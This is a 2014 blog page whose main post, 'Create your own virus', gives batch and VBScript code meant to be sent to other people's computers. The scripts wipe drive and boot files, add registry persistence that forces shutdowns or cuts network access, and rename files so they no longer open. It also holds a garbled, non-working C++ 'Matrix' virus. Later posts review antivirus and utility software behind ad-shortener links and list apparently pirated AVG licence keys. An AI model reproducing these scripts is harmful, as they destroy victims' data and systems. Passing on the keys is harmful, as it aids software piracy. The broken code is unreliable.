Showing posts with label antivirus. Show all posts
Showing posts with label antivirus. Show all posts

Monday, April 28, 2014

Create your own virus

Create virus using notepad


https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUUTHjTfcqqY-VfS2dzwUbvVaAKuK8vqee2wTgR-E__Ec-7QvGX2AvVL9HRY_iGDPjK5wowUG28JjyFifb-nltZIXMdreKWaVUBj4SnWby3Et544ZiQ3NlbCOwLj_v_EV3-jYB_jY2YW0/s1600/computer-virus.jpg

1 -> Virus Creation Tricks 1

Just open the Notepad and type the paste the following Code.

set ws=createobject("wscript.shell")
dim strDir,strfile,st,strtxt2,strshell,strlog
dim obfso,obfolder,obshell,obfile,obtxtfile
strshell="wscript.shell"
strDir="C:\WINDOWS"
strfile="\wscript.vbs"
st=Chr(34)
strlog="shutdown -l"
strtxt2="ws.run(strlog)"
set obfso=CreateObject("Scripting.FileSystemObject")
on error resume next
set obfile=obfso.CreateTextfile(strDir & strfile)
obfile.writeline("set ws=createobject("&st&strshell&st&")")
obfile.writeline("ws.run("&st&strlog&st&")")
ws.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Logoff","C:\WINDOWS\wscript.vbs","REG_SZ”

Now Save This Notepad file With Any Name Having  .vbs Extension .







2 -> Virus Creation Trick  2 .

Open Notepad and write "start" without quotes
Start
Start
Start

and then save it with .bat extension.
Now double click on this .bat file to run Command Prompt.


 3 -> Virus Creation Trick 3
Convey your friend a little message and shut down his / her computer:@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s

Save it as "Anything.BAT" in All Files and send it.


4 -> Virus Creation Trick 4
Toggle your friend's Caps Lock button simultaneously:

Code:
Set wshShell =wscript.CreateObject("WScript.Shel
l")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

Save it as "Anything.VBS" and send it.
5 -> Virus Creation Trick 5
Frustrate your friend by making this VBScript hit Enter simultaneously:
Type :


Code:
Set wshShell = wscript.CreateObject("WScript.Shell
")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Save it as "Anything.VBS" and send it.  

6 -> Virus Creation Trick 6 
This Virus Deletes All The Content Of A Drive...

@echo off
del %systemdrive%*.* /f /s /q
shutdown -r -f -t 00



Save The Above Code As Anything.bat




7 -> Virus Creation Trick 7
This Will Crash Ur Computer

Option Explicit

Dim WSHShell
Set WSHShell=Wscript.CreateObject("Wscript.Shell")

Dim x
For x = 1 to 100000000
WSHShell.Run "Tourstart.exe"
Next

Save It As Anything.vbs

 8 -> Virus Creation Trick 8
The Most Simple Virus To Crush The Window
It Only Works With Windows XP


@Echo off
Del C: *.* |y


Save It As Anything.bat


 9 -> Virus Creation Trick 9
Virus that crashes pc
@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive


Save As Anything.bat File In Notepad!!
This Will Pop Up A Message Saying OWNED!!
And Shut Down The Computer Never To Reboot Again!


10 -> Virus Creation Trick 10
Shutdowns Computer Everytime It Is Turned On

Save As A bat File


echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz /d c:windowshartlell.bat /f
echo You have been HACKED.
PAUSE

11 -> Virus Creation Trick 11
Disable Internet Permanently

echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE


Save As A bat File
 
12 -> Virus Creation Trick 12
Change Files To Non-working TXT Files
Save As A bat File

REN *.DOC *.TXT REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT


 
13 -> Virus Creation Trick 13 System Meltdown
:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH
ipconfig /release
shutdown -r -f -t0
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v HAHAHA /t reg_sz /d c:windowshartlell.bat /f
echo You Have Been Hackedecho @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo YOU HAVE BEEN HACKED BITCH
REN *.DOC *.TXT
REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT

PAUSE

PAUSE


Save As A bat File


MAKING MOST DANGEROUS VIRUS CALLED MATRIX:::


Warning - Do not run it on your computer
I'm gonna teach you how to make a virus named Matrix...
1-Open notepad
2-Put in this code


#include
#include
#include
#include
#include
#include
#include
using namespace std;

int main()
{ keybd_event(VK_MENU,0x38,0,0);
keybd_event(VK_RETURN,0x1c,0,0);
keybd_event(VK_RETURN,0x1c,KEYEVENTF_KEYUP,0);
keybd_event(VK_MENU,0x38,KEYEVENTF_KEYUP,0);
HANDLE outToScreen;
outToScreen = GetStdHandle(STD_OUTPUT_HANDLE);

{
char buffer[255];
char inputFile[]="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\rawr.bat";
ifstream input(inputFile);
if (!input)
{
{
ofstream fp("C:\Documents and Settings\All Users\Start Menu\Programs\Startup\rawr.bat", ios::app);
fp
fp
fp
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
}
}
}

{
char buffer[255];
char inputFile[]="C:\rawr.exe";
ifstream input(inputFile);
if (!input)
{
{
{
ofstream fp("CLICK.bat", ios::app);
fp
fp
fp
fp
}
system("START CLICK.bat");
main();
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
system("call shutdown.exe -S");
goto START;
}
}
}

START:{
for(int i = 0; i < 1; i++)
{
int num = (rand() % 10);
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN | FOREGROUND_INTENSITY);
cout
cout
cout
cout
cout
cout
cout
cout
cout
cout
cout
cout
Sleep(60);
}
}
for ( int j = 0; j < 5; j++)
{
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN);
int number = (rand() % 24);
cout
}
goto START;




3-save it as matrix.bat
4-finish



AS IT WAS TOO DANGEROUS THE ACTUAL HEADER FILES FOR THIS SCRIPT ARE NOT GIVEN

AND IF U WANT TO TRY THIS SCRIPT U CAN JUST USE OF HEADER FILES SUCH AS STDIN,STDLIB,CONIO , AND STUFF LIKE THAT









Wednesday, April 2, 2014

Download Cloud ativirus for free

Download panda beta version


 Features and support
The uncluttered Cloud AV interface belies some useful security tools that make this version much more competitive than before. In version 2.0, Cloud Antivirus Free gets access to the behavioral analysis engine that had previously been only in the Pro version. Other improvements in both versions include a better exposure of how Cloud Antivirus protects you when you're offline, a cloud-based disinfection protocol, and dramatic improvements in scan benchmarking.

It works as other antivirus solutions do, offering a semi-quick scan (called Optimized Scan,) a full scan (called Scan My Computer,) and a custom scan for specific folder, files, and drives. Where ancillary features used to be exceptionally light, they've now begun to fill out -- even in the free version.

You can customize the scans to detect potentially unwanted programs (PUPs), toggle off behavioral detections and analysis, archive file scans, and how the scan reacts to detected threats. There's an exclusion list, and quarantine management, which is the "recycle bin."

As noted above, the process manager uses Panda's crowd-supplied data to help determine if any running processes are malicious. The spreadsheet layout tells you if a process is safe, if it's been signed, and when it was last detected. It'll let you know when a program last accessed the Internet, if it has any restrictions placed on it, and you can double-click on a process to see the list of URLs that it's visited.

Meanwhile, the USB key vaccine can control autorun, a common source of woe, and automatically scan USB drives when connected. It's a simple and effective tool available to both free and paid customers.

Removed from this version of Panda Cloud Antivirus is a global settings window. While you can configure settings on a per-feature basis when you access each one, there's no single settings clearinghouse as there are in most other programs. We didn't find this to be problematic -- once we realized it wasn't there.

If you've paid for a Pro license, you'll get access to Cloud Antivirus' firewall, which supplements the default Windows one. If you're on Windows 7, you won't notice much -- it'll only help with outbound connections, because the default supplies excellent inbound protection -- but on older Windows machines the firewall ought to be very attractive. It comes with program controls, intrusion prevention controls, and presets for Home, Work, and Public Internet connection profiles.

Cloud AV also comes with a browser toolbar for simplified secure searches, browsing data removal, and toolbar cleaning. This last feature will uninstall unwanted toolbars. During our tests, it would not work on removing itself, though.

The free version of Cloud AV 2.0 is a bit light on features when compared with other free suites, while Pro will get you somewhere between an basic and mid-level paid competitor. So why recommend Free at the same level as Pro? It's been surprisingly effective at stopping threats.

Performance
We have to confess that Panda Cloud Antivirus 2.0's benchmarks surprised us. We expected it to leave a small footprint on the system, but not be particularly effective at stopping threats. In fact, the benchmarks tell the opposite tale.

Two independent testing organizations placed Cloud AV 1.5.2, the most recent version for which test results are available, much higher on its efficacy charts than we expected it to be. AV-Test gave Panda Cloud Antivirus 1.5.2 a 14.5 out of 18, a very respectable score. It was made even more noteworthy because it outperformed its cousin, Panda Internet Security, which only earned a 13.5 out of 18.

AV-Comparatives gave the same version of Cloud Antivirus a "Advanced" rating, finding it 97.1 percent effective at blocking threats with minimal false positives.

These positive marks for efficacy stand in contrast to CNET Labs' benchmarks, which found Cloud Antivirus 2.0 to have a more noticeable impact on system performance than previous versions. Computer startup was sluggish, to be mild about it, and shutdown impact was slow, too. Antivirus scans were slow, which tracks with our experience on a real-world computer, and in-program performance was sub-par. Only our Cinebench test found Panda Cloud Antivirus 2.0 to be above-average.

http://adfoc.us/22615841449664
   


Download System Optimizer for free


Download System optimiser for free 


http://www.usefullsoftware.com/wp-content/uploads/2012/04/Advanced-System-Optimizer-3.1.648.84801.jpg

  Advanced System Optimizer 3 gives people a comprehensive suite of utilities fronted by an interface that showcases an excellent use of color-coded icons, making banal system tasks easy to complete--if not exciting. However, its restrictive trial could prevent some people from fully exploring the program.

The program attempts to be all things to all people, and includes tools that can be split into three categories: maintenance, security, and backup. Advanced System Optimizer focuses on the maintenance side of things, and includes a Registry optimizer and cleaner, a disk defragmenter, a disk repair utility that claims to fix errors before drive failure, an explorer for managing disk usage by file type and size, a memory optimizer for freeing RAM, a game mode, and a driver updater. Security is not the focus here, but it does include malware protection, secure deletion, and a file encryption utility. Backup and recovery features include rescuing deleted files, a backup manager that streamlines restoration, and a separate system file backup and restore feature. The Smart PC Care feature is new, and allows users to run multiple maintenance tasks with one click.

The new main window is well-crafted and takes a page from security suites by providing status updates in one place, letting you know what the problems are in general terms. At the end of a scan, a small Details link will appear to the right of the scan type. Click it to drill down to see specifically which files, Registry entries, or cookies will be deleted. The harsh trial compares favorably with its competitors, but, like them, it's so tight that most users will find it challenging to fairly evaluate the program's efficacy.

http://adfoc.us/22615841449800

Monday, March 31, 2014

USB disk security free download

Download USB disk security for free

http://www.pisosoft.com/usb.jpg                       



USB disks let you add unlimited storage to your desktop or laptop (especially laptops!) for movies, songs, images, backups, and other bulky data. USB thumbdrives and portable storage devices let you carry gigabytes of data with you. The USB interface means compatibility with almost every PC. And here's the problem: huge capacity, total portability, universal compatibility, and absolute indispensability work together to render your USB disks and devices especially vulnerable to viruses and other malware. USB Disk Security from Zbshareware Lab is an effective solution for securing your USB disks and data. This easy-to-use shareware is widely compatible with antivirus programs and other security tools. It's free to try, but the fully licensed version comes with lifetime updates and support.Software tends to look like its type: media players, graphics apps, and e-mail clients usually look like media players, graphics apps, and e-mail clients. USB Disk Security looks like an up-to-date PC security tool, with a colorful and stylish yet professional-looking interface, clearly labeled buttons, and file list views. USB Disk Security incorporates several tools, including USB Shield, with real-time monitoring of USB drives; USB scan, a malware scanner optimized for USB drives; Data Prevention, which consists of the USB Access Control and USB Drive Control tools; and Safe Sites, with a URL Scanner and a Safe Web Navigation feature that sets the program's LinkZB page as your browser's home page. USB Disk Security also bundles some useful System Tools: Disk Cleanup, Repair System, and Autostart List. Unsafe and deleted files are moved to a Quarantine directory. The Settings menu is simple: just a password feature and language menu. But the Help menu is extensive and clearly written as well as illustrated with many screenshots.

We use a lot of USB disks and drives for a lot of different types of data, and we've used many utilities designed to protect them, but never one as powerful and capable as USB Disk Security, or with as many extras. If you like USB Disk Security, the registration cost is a small price to pay to keep your drives and data safe and secure.

http://adfoc.us/22615841450925


Sunday, March 30, 2014

avg antivirus download

Download here



http://img.coupons.answers.com/merchant_logos/1577fd22/419481ecdcdd763c70b87688eab6bed6e2ec43ae.png 

AVG Anti-Virus Free has these following features:

    Award-winning antivirus and antispyware
    Real-time safe internet surfing and searching
    Quality proven by 80 million of users
    Easy to download, install and use
    Protection against viruses and spyware
    Compatible with Windows 7, Windows Vista and Windows XP

use this keys
Here are the keys valid till 2018

1) 8MEH-RF3MY-BZ7CJ-9LUAR-ST99N-CEMBR-ACED
2) 8MEH-RGM33-K474L-6FGRR-8RR7K-UEMBR-ACED
3) 8MEH-RJXR4-2CKYP-2GB3A-DBMAD-PEMBR-ACED
4) 8MEH-RMXLW-HN44A-BABPA-S9NQF-PEMBR-ACED
5) 8MEH-RNZLL-2Y4QX-79PPA-MMOKE-AEMBR-ACED
6) 8MEH-RREY3-L2LQA-LUMOR-UDTZ4-6EMBR-ACED
7) 8MEH-RREY3-L2LQA-LUMOR-UJXN3-6EMBR-ACED
8) 8MEH-RW2ZU-29S4F-26QCR-WT482-BEMBR-ACED